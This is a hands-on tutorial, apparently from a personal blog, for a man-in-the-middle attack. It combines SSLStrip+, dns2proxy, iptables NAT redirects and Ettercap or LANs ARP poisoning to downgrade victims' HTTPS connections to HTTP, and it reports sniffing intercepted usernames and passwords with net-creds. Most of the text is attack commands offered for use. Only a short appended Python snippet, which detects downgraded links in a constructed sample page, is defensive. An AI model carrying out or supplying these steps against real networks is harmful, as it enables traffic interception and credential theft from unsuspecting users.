There is a presentation on using SSLStrip+ together with dns2proxy, as well as a few videos from enthusiasts on the subject, but I have not found full step-by-step instructions on how to do it. This article therefore fills that gap: here I have tried to describe the steps for running SSLStrip+ and dns2proxy as fully as possible. I did the testing on BlackArch, but the nature of the commands means they should also work on, for example, Kali Linux.


During testing I was able to downgrade HTTPS to HTTP for sites such as google.com, yandex.ru and vk.com; it failed for facebook.com and mail.ru (I have not tried others).

Install the necessary packages:

sudo pacman -S python2-service-identity ettercap-gtk

Note that I did not install sslstrip or dns2proxy from the repositories, since dns2proxy is absent from the BlackArch repositories and sslstrip is provided there only in its regular version (not SSLStrip+).


I ran the commands that follow while logged in as root.

Enable IP forwarding on your machine:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Configure iptables to redirect HTTP and DNS traffic:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 2000
sudo iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

Download and run SSLStrip+:

git clone https://github.com/singe/sslstrip2.git
cd sslstrip2/
sudo python2 ./sslstrip.py -l 2000

Download and run dns2proxy:

git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
sudo python2 dns2proxy.py

Then I suffered a setback with arpspoof and LANs. In BlackArch, by the way, arpspoof is called smikims-arpspoof. For some reason the command did not work for me.

With LANs I did the following. I looked up the victim's IP:

sudo nmap -sn 192.168.1.0/24

And ran the program with the following arguments:

sudo lans -u -p -d -ip 192.168.1.33 -i enp0s3

In principle, spoofing and sniffing worked, because with Net-Creds I can see intercepted usernames and passwords, but the traffic bypasses SSLStrip+ and dns2proxy:

sudo net-creds -i enp0s3

By the way, LANs cleans up when it exits, i.e. you may need to re-enable forwarding and the firewall rules afterwards.

Then I decided to use Ettercap for spoofing. I did it in the classic way:

Run the graphical user interface (-G):

sudo ettercap -G

In the menu choose Sniff, then Unified, and select the desired interface:

Now select Hosts, then the Scan for hosts sub-item. After scanning, select Hosts list.

As Target 1 select the router (Add to Target 1); as Target 2 select the device to be attacked (Add to Target 2).

Now go to the Mitm menu. There select ARP poisoning... and tick Sniff remote connections.

At this point I stopped, because SSLStrip+ and dns2proxy were working. Although SSLStrip+ obviously worked (it downgraded the protocol to HTTP), errors constantly appeared in the program window; perhaps this is normal behaviour.
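As an added example that is not part of the original article: a small Python check, written from the client's side, for the kind of downgrade described above. It assumes a set of hosts the client expects to reach only over HTTPS (a stand-in for the browser's HSTS cache) and assumes that SSLStrip+-style tools rewrite hostnames with prefixes such as "wwww." or "web." so the HSTS entry no longer matches; the sample page markup is constructed.

```python
import re
from urllib.parse import urlparse

# Hosts the client expects only over HTTPS (assumption: stand-in for an HSTS cache).
HSTS_HOSTS = {"www.example.com", "accounts.example.com"}

# Constructed sample: page markup as it reached the client after a downgrade.
# The first two links have been rewritten to plain HTTP with prefixed hostnames;
# the remaining two are untouched.
SAMPLE_HTML = """
<a href="http://wwww.example.com/login">Sign in</a>
<form action="http://web.accounts.example.com/auth" method="post"></form>
<img src="http://cdn.other.example/logo.png">
<a href="https://www.example.com/help">Help</a>
"""

URL_RE = re.compile(r'(?:href|action|src)="([^"]+)"', re.IGNORECASE)


def expected_hsts_host(host):
    """Map an observed hostname back to the HSTS host it stands for, or None.

    Assumed rewrite rules: 'www.x' -> 'wwww.x' (an extra leading 'w'), and any
    other host 'x' -> 'web.x'. Both undo to a name that must be in HSTS_HOSTS.
    """
    if host in HSTS_HOSTS:
        return host
    if host.startswith("wwww."):
        candidate = host[1:]            # drop the extra leading 'w'
    elif host.startswith("web."):
        candidate = host[len("web."):]  # drop the 'web.' label
    else:
        return None
    return candidate if candidate in HSTS_HOSTS else None


def find_downgraded_links(html):
    """Return (url, expected_host) for every plain-HTTP link in the received
    markup that points at a host the client expects to reach only over HTTPS."""
    findings = []
    for url in URL_RE.findall(html):
        parts = urlparse(url)
        if parts.scheme != "http" or not parts.hostname:
            continue
        expected = expected_hsts_host(parts.hostname)
        if expected is not None:
            findings.append((url, expected))
    return findings


if __name__ == "__main__":
    for url, host in find_downgraded_links(SAMPLE_HTML):
        print(f"downgraded link {url} (client expected HTTPS to {host})")
```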
